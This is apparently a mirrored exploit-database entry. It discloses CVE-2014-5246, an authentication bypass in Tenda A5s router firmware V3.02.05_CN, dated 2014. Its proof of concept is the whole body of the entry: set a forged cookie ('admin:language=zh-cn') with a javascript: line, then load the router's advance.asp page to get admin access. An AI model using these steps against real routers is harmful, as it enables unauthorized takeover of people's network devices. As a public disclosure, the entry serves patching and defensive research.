Skip to content
cyberexploits
webapphardwaretext

Tenda A5s Router 3.02.05_CN - Authentication Bypass

Tenda A5s Router 3.02.05_CN - Authentication Bypass

Publié le 2014-08-18

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/hardware/webapps/34361.txt7eac4c3a
raw
-----------------------------------------------------------------------

          Tenda A5s Router Authentication Bypass Vulnerability

-----------------------------------------------------------------------

Author      : zixian

Mail        : me@zixian.org

Date        : Aug, 17-2014

 

Vendor      : http://tenda.com.cn/

Link        : http://tenda.com.cn/Catalog/Product/223

Version     : V3.02.05_CN

CVE         : CVE-2014-5246

 

Exploit & p0c

_____________

 

go to

    http://192.168.2.1/

 

then set cookie with javascript

 

    javascript:document.cookie='admin:language=zh-cn'



go to

    http://192.168.2.1/advance.asp



you are the admin!

_____________

Voir sur GitHub